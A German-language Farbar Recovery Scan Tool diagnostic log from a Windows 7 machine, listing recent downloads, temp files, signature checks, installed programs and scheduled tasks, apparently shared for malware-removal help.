2016-03-21 21:43 - 2016-03-22 00:32 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E14 1080p HDTV X264-DIMENSION
2016-03-21 21:43 - 2016-03-21 21:43 - 00000000 ____D C:\Users\Ben\Downloads\Workaholics S06E08 The Fabulous Murphy Sisters 1080p WEB-DL AAC2 0 H 264-BTN
2016-03-18 21:55 - 2016-03-19 00:23 - 00000000 ____D C:\Users\Ben\Downloads\The Hunger Games Mockingjay Part 2 2015 720p BRRip X264 AC3-PLAYNOW
2016-03-18 18:05 - 2016-03-18 18:27 - 00000000 ____D C:\Users\Ben\Downloads\Workaholics S06E10 720p HDTV x264-KILLERS
2016-03-18 17:28 - 2016-03-18 18:05 - 00000000 ____D C:\Users\Ben\Downloads\How to Get Away with Murder S02E15 720p HDTV X264-DIMENSION
2016-03-18 01:56 - 2016-03-18 02:07 - 00000000 ____D C:\Users\Ben\Downloads\It s Always Sunny in Philadelphia S11E10 The Gang Goes to Hell Part Two 1080p WEB DL AAC2 0 H 264
2016-03-17 01:13 - 2016-03-17 01:36 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E11 720p HDTV x264-AVS
2016-03-16 01:21 - 2016-03-17 02:09 - 00000000 ____D C:\Users\Ben\Downloads\I A S P 1109 720p NewAge
2016-03-15 23:17 - 2016-03-15 23:25 - 00000000 ____D C:\Users\Ben\Downloads\Family Guy S14E16 720p HDTV x264-AVS
2016-03-15 00:16 - 2016-03-15 23:16 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E13 1080p HDTV X264-DIMENSION
2016-03-14 22:45 - 2016-03-14 23:58 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E09 1080p HDTV X264-DIMENSION
2016-03-13 22:14 - 2016-03-14 01:18 - 00000000 ____D C:\Users\Ben\Downloads\WBB ThHungerGmesMockingjayP1 108BlRy
2016-03-13 06:58 - 2016-03-16 01:21 - 00000000 ____D C:\Users\Ben\Downloads\I A S P 1108 720p NewAGe
2016-03-11 22:02 - 2016-03-11 22:41 - 00000000 ____D C:\Users\Ben\Downloads\How to Get Away with Murder S02E14 720p HDTV X264-DIMENSION
2016-03-11 21:22 - 2016-03-11 22:15 - 00000000 ____D C:\Users\Ben\Downloads\The Big Bang Theory S09E18 1080p HDTV X264-DIMENSION
2016-03-11 19:16 - 2016-03-11 19:41 - 00000000 ____D C:\Users\Ben\Downloads\Workaholics S06E09 720p HDTV x264-FLEET
2016-03-10 20:59 - 2016-03-10 21:26 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E10 1080p WEB DL DD5 1 H 264

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-09 17:25 - 2012-07-31 16:12 - 00001112 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA.job
2016-04-09 17:25 - 2012-02-20 13:38 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-09 16:58 - 2015-07-26 18:00 - 04952336 _____ (Advanced Micro Devices, Inc.) C:\Users\Ben\Downloads\autodetectutility.exe
2016-04-09 16:31 - 2009-07-14 06:45 - 00021808 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-04-09 16:31 - 2009-07-14 06:45 - 00021808 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-04-09 16:24 - 2015-09-03 16:00 - 00000000 ____D C:\Program Files (x86)\Steam
2016-04-09 16:23 - 2012-02-20 13:38 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-09 16:23 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-04-09 16:22 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\ModemLogs
2016-04-09 16:07 - 2015-07-27 16:21 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-04-09 16:05 - 2015-07-27 16:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2016-04-09 16:05 - 2015-07-27 16:20 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2016-04-09 15:59 - 2009-07-14 07:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-04-09 15:51 - 2011-04-12 09:43 - 00699432 _____ C:\Windows\system32\perfh007.dat
2016-04-09 15:51 - 2011-04-12 09:43 - 00149572 _____ C:\Windows\system32\perfc007.dat
2016-04-09 15:51 - 2009-07-14 07:13 - 01620684 _____ C:\Windows\system32\PerfStringBackup.INI
2016-04-09 15:51 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2016-04-09 15:19 - 2012-03-23 06:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-04-09 15:17 - 2016-03-06 20:51 - 00000000 ____D C:\AdwCleaner
2016-04-09 15:14 - 2015-07-26 04:52 - 00000619 _____ C:\Users\Ben\Desktop\serien.txt
2016-04-09 15:14 - 2015-07-26 03:23 - 00000000 ____D C:\Users\Ben\AppData\Local\JDownloader v2.0
2016-04-09 15:13 - 2012-02-08 22:36 - 00000000 ____D C:\Users\Ben\AppData\Roaming\vlc
2016-04-09 00:34 - 2012-07-31 16:12 - 00001060 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core.job
2016-04-01 16:46 - 2013-03-05 01:50 - 00207872 ___SH C:\Users\Ben\Downloads\Thumbs.db
2016-03-30 22:27 - 2012-07-31 16:13 - 00002353 _____ C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-21 03:24 - 2015-07-26 03:52 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-21 03:24 - 2013-05-20 00:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-03-12 00:13 - 2015-09-03 16:44 - 00002664 _____ C:\Users\Ben\AppData\Roaming\SpeedRunnersLog.txt
2016-03-11 21:52 - 2013-05-20 00:28 - 00154816 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2016-03-11 21:52 - 2013-05-20 00:28 - 00133168 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2016-03-11 21:52 - 2013-05-20 00:28 - 00069888 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2016-03-10 14:09 - 2015-07-27 16:20 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-03-10 14:08 - 2015-07-27 16:20 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-03-10 14:08 - 2015-07-27 16:20 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-03-10 01:26 - 2016-03-09 20:35 - 00000000 ____D C:\Users\Ben\Downloads\Bl ack Fla g-Ro lli nBan d-Di cog rap hy

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2005-04-21 14:53 - 2005-04-21 14:53 - 0143210 _____ () C:\Program Files (x86)\Bitte zuerst lesen.html
2005-04-13 10:10 - 2005-04-13 10:10 - 0036092 _____ () C:\Program Files (x86)\How to Uninstall.pdf
2005-03-08 08:41 - 2005-03-08 08:41 - 0016118 _____ () C:\Program Files (x86)\Installationsanleitung.html
2015-09-03 16:44 - 2016-03-12 00:13 - 0002664 _____ () C:\Users\Ben\AppData\Roaming\SpeedRunnersLog.txt
2015-10-04 16:22 - 2015-10-04 19:20 - 0003012 _____ () C:\Users\Ben\AppData\Roaming\TargetInvocationLog.txt
2012-02-08 21:57 - 2012-02-08 21:57 - 0000003 _____ () C:\Users\Ben\AppData\Local\user_data.ini
2013-01-05 16:42 - 2013-01-05 16:42 - 0017408 _____ () C:\Users\Ben\AppData\Local\WebpageIcons.db

Einige Dateien in TEMP:
====================
C:\Users\Ben\AppData\Local\Temp\20121014040900385jniverify.dll
C:\Users\Ben\AppData\Local\Temp\20121014042737302jniverify.dll
C:\Users\Ben\AppData\Local\Temp\2012101404373187jniverify.dll
C:\Users\Ben\AppData\Local\Temp\amd-catalyst-15.7-without-dotnet45-win7-64bit.exe
C:\Users\Ben\AppData\Local\Temp\AskSLib.dll
C:\Users\Ben\AppData\Local\Temp\AutoDetectUtilApp.exe
C:\Users\Ben\AppData\Local\Temp\AutoRun.exe
C:\Users\Ben\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Ben\AppData\Local\Temp\avgnt.exe
C:\Users\Ben\AppData\Local\Temp\CmdLineExt02.dll
C:\Users\Ben\AppData\Local\Temp\Crysis_Patch_1_2_launcher.exe
C:\Users\Ben\AppData\Local\Temp\devcon.exe
C:\Users\Ben\AppData\Local\Temp\drm_dialogs.dll
C:\Users\Ben\AppData\Local\Temp\drm_dyndata_7340014.dll
C:\Users\Ben\AppData\Local\Temp\eauninstall.exe
C:\Users\Ben\AppData\Local\Temp\EpsonInkjetDriverDownloader.EXE
C:\Users\Ben\AppData\Local\Temp\FP_PL_PFS_INSTALLER_32bit.exe
C:\Users\Ben\AppData\Local\Temp\gkey.exe
C:\Users\Ben\AppData\Local\Temp\JDSetup130823473464558321.exe
C:\Users\Ben\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\Ben\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\Ben\AppData\Local\Temp\libeay32.dll
C:\Users\Ben\AppData\Local\Temp\msvcr120.dll
C:\Users\Ben\AppData\Local\Temp\pkeyui.exe
C:\Users\Ben\AppData\Local\Temp\proxy_vole3284755581054529925.dll
C:\Users\Ben\AppData\Local\Temp\proxy_vole5052205090074723520.dll
C:\Users\Ben\AppData\Local\Temp\proxy_vole8465513278996893868.dll
C:\Users\Ben\AppData\Local\Temp\raptrpatch.exe
C:\Users\Ben\AppData\Local\Temp\raptr_stub.exe
C:\Users\Ben\AppData\Local\Temp\SIntf16.dll
C:\Users\Ben\AppData\Local\Temp\SIntf32.dll
C:\Users\Ben\AppData\Local\Temp\SIntfNT.dll
C:\Users\Ben\AppData\Local\Temp\sqlite3.dll
C:\Users\Ben\AppData\Local\Temp\swt-win32-3349.dll
C:\Users\Ben\AppData\Local\Temp\tmp229C.exe
C:\Users\Ben\AppData\Local\Temp\tmpBB81.exe
C:\Users\Ben\AppData\Local\Temp\tmpD844.exe
C:\Users\Ben\AppData\Local\Temp\vlc-2.0.2-win32.exe
C:\Users\Ben\AppData\Local\Temp\vlc-2.0.5-win32.exe
C:\Users\Ben\AppData\Local\Temp\vlc-2.0.6-win32.exe
C:\Users\Ben\AppData\Local\Temp\vlc-2.2.1-win32.exe
C:\Users\Ben\AppData\Local\Temp\wabk.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-02-08 16:26

==================== Ende von FRST.txt ============================

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Ben (2016-04-09 17:40:23)
Gestartet von C:\Users\Ben\Desktop
Windows 7 Professional Service Pack 1 (X64) (2012-02-08 19:48:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1744302370-2936264581-3152195107-500 - Administrator - Disabled)
Ben (S-1-5-21-1744302370-2936264581-3152195107-1000 - Administrator - Enabled) => C:\Users\Ben
Gast (S-1-5-21-1744302370-2936264581-3152195107-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1744302370-2936264581-3152195107-1005 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-PDF Split & Merge Version 2.5.0 (Build 168) (HKLM-x32\...\7-PDF Split & Merge_is1) (Version: 7-PDF Split & Merge - Version 2.5.0 (Build 168) - 7-PDF, Germany - Thorsten Hodes)
Acrobat.com (HKLM-x32\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (x32 Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.7.0.19480 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Creative Suite 2 (HKLM-x32\...\{0134A1A1-C283-4A47-91A1-92F19F960372}) (Version:  - )
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{F37078EA-4B6A-1D6F-6FED-3EDF2117B42C}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AP Tuner 3.08 (HKLM-x32\...\AP Tuner 3.08) (Version:  - )
Apple Application Support (HKLM-x32\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B8AD779A-82DA-4365-A7D0-AD3DCFC55CFF}) (Version: 5.1.1.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASRock App Charger v1.0.5 (HKLM\...\ASRock App Charger_is1) (Version:  - ASRock Inc.)
ASRock eXtreme Tuner v0.1.122 (HKLM-x32\...\ASRock eXtreme Tuner_is1) (Version:  - )
ASRock InstantBoot v1.29 (HKLM-x32\...\ASRock InstantBoot_is1) (Version:  - )
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{3b87484e-d70b-4b4f-ad59-2ae89571e2cf}) (Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG) Hidden
Call of Duty(R) - World at War(TM) (HKLM-x32\...\InstallShield_{D80A6A73-E58A-4673-AFF5-F12D7110661F}) (Version: 1.1 - Activision)
Call of Duty(R) - World at War(TM) (x32 Version: 1.0 - Activision) Hidden
Call of Duty(R) - World at War(TM) 1.1 Patch (x32 Version:  - ) Hidden
Call of Duty(R) - World at War(TM) 1.1 Patch (x32 Version: 1.1 - Activision) Hidden
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.4.0.2971 - CDBurnerXP)
Cisco AnyConnect Secure Mobility Client  (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.0.11042 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.0.11042 - Cisco Systems, Inc.) Hidden
Crysis(R) (HKLM-x32\...\{000E79B7-E725-4F01-870A-C12942B7F8E4}) (Version: 1.20.0000 - Electronic Arts)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
DivX-Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.5 - DivX, LLC)
Etron USB3.0 Host Controller (x32 Version: 0.104 - Etron Technology) Hidden
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version:  - )
Fallout New Vegas (HKLM-x32\...\Fallout New Vegas_is1) (Version:  - )
FIFA 11 (HKLM-x32\...\{3FEA6CD1-EA13-4CE7-A74E-A74A4A0A7B5C}) (Version: 1.0.0.0 - Electronic Arts)
Free Audio CD Burner version 1.5.5.221 (HKLM-x32\...\Free Audio CD Burner_is1) (Version: 1.5.5.221 - DVDVideoSoft Ltd.)
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
Google Chrome (HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Grand Theft Auto Vice City (HKLM-x32\...\{4B35F00C-E63D-40DC-9839-DF15A33EAC46}) (Version: 1.00.000 - )
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Keep Talking and Nobody Explodes v1.0.1 version 1.0.1 (HKLM-x32\...\Keep Talking and Nobody Explodes v1.0.1_is1) (Version: 1.0.1 - WaLMaRT)
League of Legends (HKLM-x32\...\{918A9082-6287-4D25-9002-5E5D5E4971CB}) (Version: 1.02.0000 - Riot Games)
Left 4 Dead (HKLM-x32\...\Steam App 500) (Version:  - Valve)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 46.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 46.0 (x86 de)) (Version: 46.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 46.0.0.5941 - Mozilla)
Need for Speed Underground 2 (HKLM-x32\...\{909F8EBC-EC7F-48FF-0085-475D818F0F31}) (Version:  - )
OpenOffice.org 3.3 (HKLM-x32\...\{4286716B-1287-48E7-9078-3DC8248DBA96}) (Version: 3.3.9567 - OpenOffice.org)
PDF Split And Merge Basic (HKLM\...\{9A40D2F8-9458-458B-95E3-B57797C574E1}) (Version: 2.2.3 - Andrea Vacondio)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.6.0 - Frank Heindörfer, Philip Chinery)
Portal (HKLM-x32\...\Steam App 400) (Version:  - Valve)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
RAR Repair Tool v.4.0.1 (HKLM-x32\...\RAR Repair Tool_is1) (Version:  - ZRT Labs)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.44.421.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6378 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.6 - Samsung Electronics)
Secure Download Manager (HKLM-x32\...\{6E839820-0BBA-4310-9D06-4463BAEA6641}) (Version: 3.1.01 - Kivuto Solutions Inc.)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.)
SpeedRunners (HKLM-x32\...\Steam App 207140) (Version:  - DoubleDutch Games)
SpeedRunners Beta r29 (HKLM-x32\...\SpeedRunners_is1) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Suite Specific (x32 Version: 2.0.0 - Adobe Systems, Incorporated) Hidden
The Forest Alpha 0.21c / RePack by MarkusEVO (HKLM-x32\...\{F70A80C7-5194-FOREST-A6E5-BB68B89D566C}_is1) (Version: Alpha 0.21c - )
The Jackbox Party Pack (HKLM-x32\...\Steam App 331670) (Version:  - Jackbox Games, Inc.)
THX TruStudio (HKLM-x32\...\{AFB907F5-C0E6-4753-8284-DE955EF86AC2}) (Version: 1.00.01 - Creative Technology Limited)
TL-WN751ND Driver (HKLM-x32\...\{14770694-6C1C-4137-95F9-6F934D8491B4}) (Version: 1.00.0000 - TP-LINK)
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
UltraStar 1.0.2 (HKLM-x32\...\UltraStar) (Version: 1.0.2 - SterGames)
UltraStar Deluxe (HKLM-x32\...\UltraStar Deluxe) (Version: 1.1 - USDX Team)
Unity Web Player (HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\UnityWebPlayer) (Version: 5.0.3f2 - Unity Technologies ApS)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Wondershare DVD Creator(Build 3.3.0) (HKLM-x32\...\Wondershare DVD Creator_is1) (Version:  - Wondershare Software)
World of Goo Version 1.3 (HKLM-x32\...\{8267B856-EB48-4BA4-B89C-972751BEC7B1}_is1) (Version: 1.3 - 2D BOY)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-1744302370-2936264581-3152195107-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {08C28A08-D80B-48C4-AC65-5F4E73DF374E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {303B4F06-9161-4552-AA25-A4E586C0E6EB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {5E07F975-0AF2-41E4-98A3-F7E6C9FC9336} - System32\Tasks\{7813F31F-9D81-44E8-B6BD-98ABBAE7B5BE} => pcalua.exe -a G:\Downloads\CS2_RetNon_Ger_2.exe -d G:\Downloads
Task: {6B7FA10D-E9C0-4F3D-B07E-5D6DD5CD1D63} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {71A96727-8AB5-4B55-B70D-FE0F0C075FB8} - System32\Tasks\{441AE403-F8A7-4F93-8B0F-B3F1A4F75D54} => pcalua.exe -a E:\Setup.exe -d E:\
Task: {7725EF1D-0756-4D0D-84C7-281CF011B880} - System32\Tasks\{DD57B9E7-0B38-450F-9FD1-8EDC27A6B4BF} => pcalua.exe -a G:\Downloads\CS2_RetNon_Ger_3.exe -d G:\Downloads
Task: {77CBD9E7-C979-475F-A624-1A93175E7AEC} - System32\Tasks\{9DA21F79-D68C-4D96-B238-AA5A5467AB99} => C:\Users\Ben\Downloads\USB sound\Vista\Setup.exe [2007-06-21] ()
Task: {7B638AC7-BBB4-4B3A-8DD3-629D008BD1CD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {8BDB1E7F-123A-435D-B18A-03F6370F5DC6} - System32\Tasks\{C7F79A47-BAF5-43D4-B22B-CDE1C0D44458} => pcalua.exe -a N:\Autorun.exe -d N:\
Task: {8E8C7228-9E49-4E85-96C2-F9C647354B08} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
